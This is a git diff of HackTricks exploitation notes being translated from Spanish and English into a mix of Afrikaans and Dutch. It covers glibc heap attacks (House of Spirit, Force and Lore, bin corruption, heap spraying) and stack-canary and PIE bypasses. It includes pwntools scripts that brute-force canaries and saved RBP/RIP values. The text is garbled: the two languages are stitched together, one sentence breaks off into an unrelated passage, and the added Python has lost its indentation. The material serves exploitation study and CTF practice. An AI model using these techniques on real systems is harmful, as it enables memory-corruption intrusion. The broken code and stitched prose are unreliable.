-Si modificamos el size para que de 16 en vez de 8 entonces: fastbin\_index() nos devolverá fastbins\[0] y podemos hacer uso de esto para sobreescribir la pila. +Hiervoor mag daar geen kanaries of vreemde waardes in die stoor wees nie, ons moet eintlik hier wees: 4 nulbyte + EBP + RET -Para esto no debe haber ningún canary ni valores raros en la pila, de hecho tenemos que encontrarnos en esta: 4bytes nulos + EBP + RET +Die 4 nulbyte is nodig omdat die **av** na hierdie adres sal wys en die eerste element van 'n **av** die mutex is wat 0 moet wees. -Los 4 bytes nulo se necesitan que el **av** estará a esta dirección y el primero elemento de un **av** es el mutexe que tiene que valer 0. +Die **av->max\_fast** sal die EBP wees en dit sal 'n waarde wees wat ons sal gebruik om die beperkings te omseil. -El **av->max\_fast** será el EBP y será un valor que nos servirá para saltarnos las restricciones. +In die **av->fastbins\[0]** sal dit oorskryf word met die adres van **p** en dit sal die RET wees, sodat dit na die shellcode sal spring. -En el **av->fastbins\[0]** se sobreescribirá con la dirección de **p** y será el RET, así se saltará a la shellcode. +Daarbenewens sal daar in **av->system\_mem** (1484 byte bo die posisie in die stoor) baie rommel wees wat ons sal toelaat om die toetsing wat gedoen word, te omseil. -Además, en **av->system\_mem** (1484bytes por encima de la posición en la pila) habrá bastante basura que nos permitirá saltarnos la comprobación que se realiza. - -Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 16, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops que van después del campo size del nuevo trozo falso). 
+Daarbenewens moet daardie aangrensende stuk na die vrygestelde stuk groter as 8 wees -> Aangesien ons gesê het dat die grootte van die vrygestelde stuk 16 is, hoef ons net 'n groter grootte as 8 in hierdie valse stuk te plaas (aangesien die shellcode in die vrygestelde stuk sal wees, moet ons 'n jmp aan die begin plaas wat in nops val wat na die grootteveld van die nuwe valse stuk kom). **The House of Spirit** -En este caso buscamos tener un puntero a un malloc que pueda ser alterable por el atacante (por ej, que el puntero esté en el stack debajo de un posible overflow a una variable). +In hierdie geval wil ons 'n aanpasbare malloc-aanwyser hê wat deur die aanvaller verander kan word (byvoorbeeld dat die aanwyser op die stoor onder 'n moontlike oorloop na 'n veranderlike is). -Así, podríamos hacer que este puntero apuntase a donde fuese. Sin embargo, no cualquier sitio es válido, el tamaño del trozo falseado debe ser menor que av->max\_fast y más específicamente igual al tamaño solicitado en una futura llamada a malloc()+8. Por ello, si sabemos que después de este puntero vulnerable se llama a malloc(40), el tamaño del trozo falso debe ser igual a 48. +Op hierdie manier kan ons hierdie aanwyser na enige plek laat wys. Nie enige plek is egter geldig nie, die grootte van die valse stuk moet kleiner wees as av->max\_fast en spesifiek gelyk wees aan die grootte wat in 'n toekomstige oproep na malloc()+8 versoek word. Daarom, as ons weet dat na hierdie kwesbare aanwyser 'n oproep na malloc(40) gemaak word, moet die grootte van die valse stuk gelyk wees aan 48. -Si por ejemplo el programa preguntase al usuario por un número podríamos introducir 48 y apuntar el puntero de malloc modificable a los siguientes 4bytes (que podrían pertenecer al EBP con suerte, así el 48 queda por detrás, como si fuese la cabecera size). Además, la dirección ptr-4+48 debe cumplir varias condiciones (siendo en este caso ptr=EBP), es decir, 8 < ptr-4+48 < av->system\_mem. 
+As byvoorbeeld die program die gebruiker vra vir 'n nommer, kan ons 48 invoer en die aanpasbare malloc-aanwyser na die volgende 4 byte wys (wat dalk aan die EBP behoort, sodat die 48 agterblyf, asof dit die groottekop is). Daarbenewens moet die adres ptr-4+48 aan verskeie voorwaardes voldoen (in hierdie geval is ptr=EBP), dit wil sê, 8 < ptr-4+48 < av->system\_mem. -En caso de que esto se cumpla, cuando se llame al siguiente malloc que dijimos que era malloc(40) se le asignará como dirección la dirección del EBP. En caso de que el atacante también pueda controlar lo que se escribe en este malloc puede sobreescribir tanto el EBP como el EIP con la dirección que quiera. +As dit voldoen word, wanneer die volgende malloc geroep word wat ons gesê het dat dit malloc(40) is, sal die adres as die EBP toegewys word. As die aanvaller ook die skryfwerk in hierdie malloc kan beheer, kan hy sowel die EBP as die EIP met die gewenste adres oorskryf. -Esto creo que es porque así cuando lo libere free() guardará que en la dirección que apunta al EBP del stack hay un trozo de tamaño perfecto para el nuevo malloc() que se quiere reservar, así que le asigna esa dirección. +Ek dink dit is omdat wanneer dit vrygelaat word free(), sal dit onthou dat daar 'n stuk van die perfekte grootte vir die nuwe malloc() wat gereserveer wil word, in die adres wat na die EBP van die stoor wys, is, sodat dit daardie adres toewys. 
**The House of Force** -Es necesario: +Dit is nodig: -* Un overflow a un trozo que permita sobreescribir el wilderness -* Una llamada a malloc() con el tamaño definido por el usuario -* Una llamada a malloc() cuyos datos puedan ser definidos por el usuario +* 'n Oorloop na 'n stuk wat die wildernis kan oorskryf +* 'n Oproep na malloc() met die grootte wat deur die gebruiker gedefinieer word +* 'n Oproep na malloc() waarvan die data deur die gebruiker gedefinieer kan word -Lo primero que se hace es sobreescribir el size del trozo wilderness con un valor muy grande (0xffffffff), así cual quiera solicitud de memoria lo suficientemente grande será tratada en \_int\_malloc() sin necesidad de expandir el heap +Die eerste ding wat gedoen word, is om die grootte van die wildernisstuk met 'n baie groot waarde (0xffffffff) te oorskryf, sodat enige geheueversoek groot genoeg in \_int\_malloc() hanteer sal word sonder om die heap uit te brei. -Lo segundo es alterar el av->top para que apunte a una zona de memoria bajo el control del atacante, como el stack. En av->top se pondrá \&EIP - 8. +Die tweede is om av->top te verander sodat dit wys na 'n geheuegebied onder die beheer van die aanvaller, soos die stoor. In av->top word \&EIP - 8 geplaas. -Tenemos que sobreescrbir av->top para que apunte a la zona de memoria bajo el control del atacante: +Ons moet av->top oorskryf sodat dit wys na die geheuegebied onder die beheer van die aanvaller: victim = av->top; 
@@ -1004,98 +981,79 @@ remainder = chunck\_at\_offset(victim, nb); av->top = remainder; -Victim recoge el valor de la dirección del trozo wilderness actual (el actual av->top) y remainder es exactamente la suma de esa dirección más la cantidad de bytes solicitados por malloc(). Por lo que si \&EIP-8 está en 0xbffff224 y av->top contiene 0x080c2788, entonces la cantidad que tenemos que reservar en el malloc controlado para que av->top quede apuntando a $EIP-8 para el próximo malloc() será: +Victim kry die waarde van die adres van die huidige wildernisstuk (die huidige av->top) en remainder is presies die som van daardie adres plus die aantal byte wat deur malloc() versoek word. Dus as \&EIP-8 in 0xbffff224 is en av->top 0x080c2788 bevat, sal die hoeveelheid wat ons moet reserweer in die beheerde malloc om av->top te laat wys na $EIP-8 vir die volgende malloc() wees: 0xbffff224 - 0x080c2788 = 3086207644. -Así se guardará en av->top el valor alterado y el próximo malloc apuntará al EIP y lo podrá sobreescribir. +Dit sal die gewysigde waarde in av->top stoor en die volgende malloc sal na die EIP wys en dit kan oorskryf. -Es importante saber que el size del nuevo trozo wilderness sea más grande que la solicitud realizada por el último malloc(). Es decir, si el wilderness está apuntando a \&EIP-8, el size quedará justo en el campo EBP del stack. +Dit is belangrik om te weet dat die grootte van die nuwe wildernisstuk groter moet wees as die versoek wat +Reserveer twee mallocs, zodat de eerste kan worden overlopen nadat de tweede is vrijgegeven en in zijn bin is geplaatst (dat wil zeggen, er is een malloc gereserveerd die groter is dan het tweede stuk voordat de overflow plaatsvindt). -**The House of Lore** +De malloc die wordt gegeven aan het door de aanvaller gekozen adres, wordt gecontroleerd door de aanvaller. 
-**Corrupción SmallBin** +Het doel is als volgt: als we een overflow kunnen veroorzaken naar een heap die een vrijgegeven stuk eronder heeft en in zijn bin zit, kunnen we de bk-pointer wijzigen. Als we de bk-pointer wijzigen en dit stuk het eerste in de bin-lijst wordt en wordt gereserveerd, zal de bin worden misleid en wordt gezegd dat het laatste stuk van de lijst (de volgende die wordt aangeboden) zich op het valse adres bevindt dat we hebben ingesteld (bijvoorbeeld op de stack of GOT). Dus als er een ander stuk wordt gereserveerd en de aanvaller er machtigingen op heeft, wordt er een stuk gegeven op de gewenste positie en kan erin worden geschreven. -Los trozos liberados se introducen en el bin en función de su tamaño. Pero antes de introduciros se guardan en unsorted bins. Un trozo es liberado no se mete inmediatamente en su bin sino que se queda en unsorted bins. A continuación, si se reserva un nuevo trozo y el anterior liberado le puede servir se lo devuelve, pero si se reserva más grande, el trozo liberado en unsorted bins se mete en su bin adecuado. +Na het vrijgeven van het gewijzigde stuk is het nodig om een groter stuk te reserveren dan het vrijgegeven stuk, zodat het gewijzigde stuk uit de unsorted bins komt en in zijn bin wordt geplaatst. -Para alcanzar el código vulnerable la solicitud de memora deberá ser mayor a av->max\_fast (72normalmente) y menos a MIN\_LARGE\_SIZE (512). +Eenmaal in zijn bin is het tijd om de bk-pointer te wijzigen met behulp van de overflow, zodat deze wijst naar het adres dat we willen overschrijven. -Si en los bin hay un trozo del tamaño adecuado a lo que se pide se devuelve ese después de desenlazarlo: +Dus de bin moet wachten tot er voldoende keren naar malloc() wordt gebeld, zodat de gewijzigde bin opnieuw wordt gebruikt en de bin wordt misleid om te geloven dat het volgende stuk zich op het valse adres bevindt. En vervolgens wordt het gewenste stuk gegeven. 
-bck = victim->bk; Apunta al trozo anterior, es la única info que podemos alterar. +Om de kwetsbaarheid zo snel mogelijk uit te voeren, zou het ideaal zijn: Reservering van het kwetsbare stuk, reservering van het stuk dat zal worden gewijzigd, dit stuk wordt vrijgegeven, een groter stuk wordt gereserveerd dan het stuk dat zal worden gewijzigd, het stuk wordt gewijzigd (kwetsbaarheid), een stuk van dezelfde grootte als het aangetaste stuk wordt gereserveerd en een tweede stuk van dezelfde grootte wordt gereserveerd en dit zal wijzen naar het gekozen adres. -bin->bk = bck; El penúltimo trozo pasa a ser el último, en caso de que bck apunte al stack al siguiente trozo reservado se le dará esta dirección +Om deze aanval te beschermen, wordt de gebruikelijke controle gebruikt om te controleren of het stuk "niet" vals is: wordt gecontroleerd of bck->fd naar victim wijst. Met andere woorden, in ons geval, als de fd-pointer van het valse stuk dat op de stack wordt aangewezen naar victim wijst. Om deze bescherming te omzeilen, moet de aanvaller op de een of andere manier in staat zijn om op het juiste adres (waarschijnlijk op de stack) het adres van victim te schrijven. Zodat het eruitziet als een echt stuk. -bck->fd = bin; Se cierra la lista haciendo que este apunte a bin +**Corruptie van LargeBin** -Se necesita: +Dezelfde vereisten als voorheen zijn nodig, plus de gereserveerde stukken moeten groter zijn dan 512. -Que se reserven dos malloc, de forma que al primero se le pueda hacer overflow después de que el segundo haya sido liberado e introducido en su bin (es decir, se haya reservado un malloc superior al segundo trozo antes de hacer el overflow) +De aanval is vergelijkbaar met de vorige, dat wil zeggen, het wijzigen van de bk-pointer en al die oproepen naar malloc() zijn nodig, maar daarnaast moet de grootte van het gewijzigde stuk worden gewijzigd, zodat size - nb < MINSIZE. 
-Que el malloc reservado al que se le da la dirección elegida por el atacante sea controlada por el atacante. +Bijvoorbeeld, stel size in op 1552 zodat 1552 - 1544 = 8 < MINSIZE (de aftrek kan niet negatief zijn omdat een unsigned wordt vergeleken). -El objetivo es el siguiente, si podemos hacer un overflow a un heap que tiene por debajo un trozo ya liberado y en su bin, podemos alterar su puntero bk. Si alteramos su puntero bk y este trozo llega a ser el primero de la lista de bin y se reserva, a bin se le engañará y se le dirá que el último trozo de la lista (el siguiente en ofrecer) está en la dirección falsa que hayamos puesto (al stack o GOT por ejemplo). Por lo que si se vuelve a reservar otro trozo y el atacante tiene permisos en él, se le dará un trozo en la posición deseada y podrá escribir en ella. - -Tras liberar el trozo modificado es necesario que se reserve un trozo mayor al liberado, así el trozo modificado saldrá de unsorted bins y se introduciría en su bin. - -Una vez en su bin es el momento de modificarle el puntero bk mediante el overflow para que apunte a la dirección que queramos sobreescribir. - -Así el bin deberá esperar turno a que se llame a malloc() suficientes veces como para que se vuelva a utilizar el bin modificado y engañe a bin haciéndole creer que el siguiente trozo está en la dirección falsa. Y a continuación se dará el trozo que nos interesa. - -Para que se ejecute la vulnerabilidad lo antes posible lo ideal sería: Reserva del trozo vulnerable, reserva del trozo que se modificará, se libera este trozo, se reserva un trozo más grande al que se modificará, se modifica el trozo (vulnerabilidad), se reserva un trozo de igual tamaño al vulnerado y se reserva un segundo trozo de igual tamaño y este será el que apunte a la dirección elegida. - -Para proteger este ataque se uso la típica comprobación de que el trozo “no” es falso: se comprueba si bck->fd está apuntando a victim. 
Es decir, en nuestro caso si el puntero fd\* del trozo falso apuntado en el stack está apuntando a victim. Para sobrepasar esta protección el atacante debería ser capaz de escribir de alguna forma (por el stack probablemente) en la dirección adecuada la dirección de victim. Para que así parezca un trozo verdadero. - -**Corrupción LargeBin** - -Se necesitan los mismos requisitos que antes y alguno más, además los trozos reservados deben ser mayores a 512. - -El ataque es como el anterior, es decir, ha que modificar el puntero bk y se necesitan todas esas llamadas a malloc(), pero además hay que modificar el size del trozo modificado de forma que ese size - nb sea < MINSIZE. - -Por ejemplo hará que poner en size 1552 para que 1552 - 1544 = 8 < MINSIZE (la resta no puede quedar negativa porque se compara un unsigned) - -Además se ha introducido un parche para hacerlo aún más complicado. +Bovendien is er een patch toegevoegd om het nog moeilijker te maken. **Heap Spraying** -Básicamente consiste en reservar tooda la memoria posible para heaps y rellenar estos con un colchón de nops acabados por una shellcode. Además, como colchón se utiliza 0x0c. Pues se intentará saltar a la dirección 0x0c0c0c0c, y así si se sobreescribe alguna dirección a la que se vaya a llamar con este colchón se saltará allí. Básicamente la táctica es reservar lo máximos posible para ver si se sobreescribe algún puntero y saltar a 0x0c0c0c0c esperando que allí haya nops. +Het bestaat er in wezen uit om zoveel mogelijk geheugen voor heaps te reserveren en deze te vullen met een nop-kussen gevolgd door een shellcode. Bovendien wordt 0x0c gebruikt als kussen. Er zal worden geprobeerd om naar het adres 0x0c0c0c0c te springen, zodat als een adres waar naartoe wordt gesprongen met dit kussen wordt overschreven, het daarheen zal springen. De tactiek is in feite om zoveel mogelijk te reserveren om te zien of er een pointer wordt overschreven en naar 0x0c0c0c0c te springen in de hoop dat er nops zijn. 
**Heap Feng Shui** -Consiste en mediante reservas y liberaciones sementar la memoria de forma que queden trozos reservados entre medias de trozos libres. El buffer a desbordar se situará en uno de los huevos. +Het bestaat erin om door middel van reserveringen en vrijgaven het geheugen zo te ordenen dat er gereserveerde stukken tussen de vrije stukken blijven zitten. De buffer die moet worden overlopen, wordt in een van de gaten geplaatst. -**objdump -d ejecutable** —> Disas functions\ -**objdump -d ./PROGRAMA | grep FUNCION** —> Get function address\ -**objdump -d -Mintel ./shellcodeout** —> Para ver que efectivamente es nuestra shellcode y sacar los OpCodes\ -**objdump -t ./exec | grep varBss** —> Tabla de símbolos, para sacar address de variables y funciones\ -**objdump -TR ./exec | grep exit(func lib)** —> Para sacar address de funciones de librerías (GOT)\ +**objdump -d uitvoerbaar** -> Disassemblage van functies\ +**objdump -d ./PROGRAMMA | grep FUNCTIE** -> Krijg het adres van de functie\ +**objdump -d -Mintel ./shellcodeout** -> Om te controleren of het daadwerkelijk onze shellcode is en om de OpCodes te krijgen\ +**objdump -t ./exec | grep varBss** -> Symbooltabel, om het adres van variabelen en functies te krijgen\ +**objdump -TR ./exec | grep exit(func lib)** -> Om het adres van functies in bibliotheken (GOT) te krijgen\ **objdump -d ./exec | grep funcCode**\ **objdump -s -j .dtors /exec**\ **objdump -s -j .got ./exec**\ -**objdump -t --dynamic-relo ./exec | grep puts** —> Saca la dirección de puts a sobreescribir en le GOT\ -**objdump -D ./exec** —> Disas ALL hasta las entradas de la plt\ +**objdump -t --dynamic-relo ./exec | grep puts** -> Haalt het adres van puts op dat moet worden overschreven in de GOT\ +**objdump -D ./exec** -> Disassemblage van ALLES tot de plt-ingangen\ **objdump -p -/exec**\ -**Info functions strncmp —>** Info de la función en gdb +**Info functions strncmp ->** Info over de functie in gdb -## Interesting courses +## Interessante 
cursussen * [https://guyinatuxedo.github.io/](https://guyinatuxedo.github.io) * [https://github.com/RPISEC/MBE](https://github.com/RPISEC/MBE) -## **References** +## **Referenties** * [**https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacken van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Andere manieren om HackTricks te ondersteunen: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Als je je **bedrijf geadverteerd wilt zien in HackTricks** of **HackTricks in PDF wilt downloaden**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)! +* Koop de [**officiële PEASS & HackTricks-merchandise**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Doe mee aan de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md b/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md index dee81c565..53862970a 100644 --- a/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md +++ b/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md @@ -1,114 +1,109 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.** +**As jy te doen het met 'n binêre lêer wat beskerm word deur 'n kanarie en PIE (Position Independent Executable), moet jy waarskynlik 'n manier vind om dit te omseil.** ![](<../../.gitbook/assets/image (144).png>) {% hint style="info" %} -Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\ -However, you can manually notice this if you find that a value is saved in the stack at the beginning of a function call and this value is checked before exiting. +Let daarop dat **`checksec`** dalk nie kan vind dat 'n binêre lêer beskerm word deur 'n kanarie as dit staties gekompileer is en nie in staat is om die funksie te identifiseer nie.\ +Jy kan egter handmatig hiervan bewus raak as jy vind dat 'n waarde aan die begin van 'n funksieoproep in die stapel gestoor word en hierdie waarde voor die uittrede nagegaan word. {% endhint %} # Brute force Canary -The best way to bypass a simple canary is if the binary is a program **forking child processes every time you establish a new connection** with it (network service), because every time you connect to it **the same canary will be used**. +Die beste manier om 'n eenvoudige kanarie te omseil, is as die binêre lêer 'n program is wat **kindprosesse vorm elke keer as jy 'n nuwe verbinding** daarmee vestig (netwerkdienste), omdat elke keer as jy daarmee verbind, **dezelfde kanarie gebruik sal word**. -Then, the best way to bypass the canary is just to **brute-force it char by char**, and you can figure out if the guessed canary byte was correct checking if the program has crashed or continues its regular flow. 
In this example the function **brute-forces an 8 Bytes canary (x64)** and distinguish between a correct guessed byte and a bad byte just **checking** if a **response** is sent back by the server (another way in **other situation** could be using a **try/except**): +Dan is die beste manier om die kanarie te omseil, om dit net **karakter vir karakter te brute force**, en jy kan uitvind of die gerade kanariebyte korrek was deur te kyk of die program afgekraak het of sy normale vloei voortgaan. In hierdie voorbeeld **brute force** die funksie **'n 8 byte kanarie (x64)** en onderskei tussen 'n korrek gerade byte en 'n slegte byte deur net te **kyk** of 'n **reaksie** deur die bediener teruggestuur word (in 'n **ander situasie** kan 'n **try/except** gebruik word): -## Example 1 - -This example is implemented for 64bits but could be easily implemented for 32 bits. +## Voorbeeld 1 +Hierdie voorbeeld is geïmplementeer vir 64-bits, maar kan maklik geïmplementeer word vir 32-bits. ```python from pwn import * def connect(): - r = remote("localhost", 8788) +r = remote("localhost", 8788) def get_bf(base): - canary = "" - guess = 0x0 - base += canary +canary = "" +guess = 0x0 +base += canary - while len(canary) < 8: - while guess != 0xff: - r = connect() +while len(canary) < 8: +while guess != 0xff: +r = connect() - r.recvuntil("Username: ") - r.send(base + chr(guess)) +r.recvuntil("Username: ") +r.send(base + chr(guess)) - if "SOME OUTPUT" in r.clean(): - print "Guessed correct byte:", format(guess, '02x') - canary += chr(guess) - base += chr(guess) - guess = 0x0 - r.close() - break - else: - guess += 1 - r.close() +if "SOME OUTPUT" in r.clean(): +print "Guessed correct byte:", format(guess, '02x') +canary += chr(guess) +base += chr(guess) +guess = 0x0 +r.close() +break +else: +guess += 1 +r.close() + +print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary) +return base - print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary) - return base - 
canary_offset = 1176 base = "A" * canary_offset print("Brute-Forcing canary") base_canary = get_bf(base) #Get yunk data + canary CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary ``` +## Voorbeeld 2 -## Example 2 - -This is implemented for 32 bits, but this could be easily changed to 64bits.\ -Also note that for this example the **program expected first a byte to indicate the size of the input** and the payload. - +Dit is geïmplementeer vir 32-bits, maar dit kan maklik verander word na 64-bits.\ +Merk ook op dat vir hierdie voorbeeld die **program verwag eers 'n byte om die grootte van die inset aan te dui** en die payload. ```python from pwn import * # Here is the function to brute force the canary def breakCanary(): - known_canary = b"" - test_canary = 0x0 - len_bytes_to_read = 0x21 - - for j in range(0, 4): - # Iterate up to 0xff times to brute force all posible values for byte - for test_canary in range(0xff): - print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="") - - # Send the current input size - target.send(len_bytes_to_read.to_bytes(1, "little")) +known_canary = b"" +test_canary = 0x0 +len_bytes_to_read = 0x21 - # Send this iterations canary - target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little")) +for j in range(0, 4): +# Iterate up to 0xff times to brute force all posible values for byte +for test_canary in range(0xff): +print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="") - # Scan in the output, determine if we have a correct value - output = target.recvuntil(b"exit.") - if b"YUM" in output: - # If we have a correct value, record the canary value, reset the canary value, and move on - print(" - next byte is: " + hex(test_canary)) - known_canary = known_canary + test_canary.to_bytes(1, "little") - len_bytes_to_read += 1 - break +# Send the current input size +target.send(len_bytes_to_read.to_bytes(1, "little")) - # Return the canary - return known_canary +# 
Send this iterations canary +target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little")) + +# Scan in the output, determine if we have a correct value +output = target.recvuntil(b"exit.") +if b"YUM" in output: +# If we have a correct value, record the canary value, reset the canary value, and move on +print(" - next byte is: " + hex(test_canary)) +known_canary = known_canary + test_canary.to_bytes(1, "little") +len_bytes_to_read += 1 +break + +# Return the canary +return known_canary # Start the target process target = process('./feedme') 
@@ -118,24 +113,22 @@ target = process('./feedme') canary = breakCanary() log.info(f"The canary is: {canary}") ``` +# Druk Kanarie -# Print Canary +'n Ander manier om die kanarie te omseil is om dit te **druk**.\ +Stel jou 'n situasie voor waar 'n **program vatbaar** vir stapoorvloei 'n **puts**-funksie kan uitvoer wat na 'n **deel** van die **stapoorvloei** wys. Die aanvaller weet dat die **eerste byte van die kanarie 'n nulbyte** (`\x00`) is en die res van die kanarie **willekeurige** bytes is. Dan kan die aanvaller 'n oorvloei skep wat die stapoorvloei oorskryf totdat net die eerste byte van die kanarie oorbly.\ +Dan roep die aanvaller die puts-funksionaliteit aan op die middel van die nutlading wat al die kanarie sal **druk** (behalwe die eerste nulbyte).\ +Met hierdie inligting kan die aanvaller 'n nuwe aanval **skep en stuur**, met kennis van die kanarie (in dieselfde programsessie). -Another way to bypass the canary is to **print it**.\ -Imagine a situation where a **program vulnerable** to stack overflow can execute a **puts** function **pointing** to **part** of the **stack overflow**. The attacker knows that the **first byte of the canary is a null byte** (`\x00`) and the rest of the canary are **random** bytes. 
Then, the attacker may create an overflow that **overwrites the stack until just the first byte of the canary**.\ -Then, the attacker **calls the puts functionalit**y on the middle of the payload which will **print all the canary** (except from the first null byte).\ -With this info the attacker can **craft and send a new attack** knowing the canary (in the same program session) - -Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**.\ -CTF example: [https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html) +Dit is duidelik dat hierdie taktiek baie **beperk** is, aangesien die aanvaller in staat moet wees om die **inhoud** van sy **nutlading** te **druk** om die **kanarie** uit te voer en dan 'n nuwe nutlading (in dieselfde programsessie) te skep en te **stuur** om die werklike stapoorvloei te veroorsaak.\ +CTF-voorbeeld: [https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html) # PIE -In order to bypass the PIE you need to **leak some address**. And if the binary is not leaking any addresses the best to do it is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function.\ -For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes (x64) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.** - -To brute-force the RBP and the RIP from the binary you can figure out that a valid guessed byte is correct if the program output something or it just doesn't crash. 
The **same function** as the provided for brute-forcing the canary can be used to brute-force the RBP and the RIP: +Om die PIE te omseil, moet jy **'n adres uitlek**. En as die binêre lêer nie enige adresse uitlek nie, is die beste om dit te doen om die **RBP en RIP wat in die stapel gestoor is, deur middel van bruto-krag** in die vatbare funksie te raai.\ +Byvoorbeeld, as 'n binêre lêer beskerm word deur beide 'n **kanarie** en **PIE**, kan jy begin om die kanarie bruto-krag te gebruik, dan sal die **volgende** 8 byte (x64) die gestoorde **RBP** wees en die **volgende** 8 byte sal die gestoorde **RIP** wees. +Om die RBP en die RIP van die binêre lêer bruto-krag te gebruik, kan jy uitvind dat 'n geldige geradeerde byte korrek is as die program iets uitvoer of net nie afkraak nie. Dieselfde funksie as die een wat voorsien is vir die bruto-krag van die kanarie, kan gebruik word om die RBP en die RIP bruto-krag te gebruik: ```python print("Brute-Forcing RBP") base_canary_rbp = get_bf(base_canary) 
@@ -144,41 +137,33 @@ print("Brute-Forcing RIP") base_canary_rbp_rip = get_bf(base_canary_rbp) RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:]) ``` +## Kry basisadres -## Get base address - -The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**. - -From the **RBP** you can calculate **where are you writing your shell in the stack**. This can be very useful to know where are you going to write the string _"/bin/sh\x00"_ inside the stack. To calculate the distance between the leaked RBP and your shellcode you can just put a **breakpoint after leaking the RBP** an check **where is your shellcode located**, then, you can calculate the distance between the shellcode and the RBP: +Die laaste ding wat jy nodig het om die PIE te oorwin, is om nuttige adresse van die uitgelekde adresse te bereken: die RBP en die RIP. +Vanaf die RBP kan jy bereken waar jy jou skulp in die stapel skryf. Dit kan baie nuttig wees om te weet waar jy die string _"/bin/sh\x00"_ binne die stapel gaan skryf. Om die afstand tussen die uitgelekde RBP en jou skulpkode te bereken, kan jy net 'n breekpunt plaas nadat die RBP uitgelek is en kyk waar jou skulpkode geleë is. 
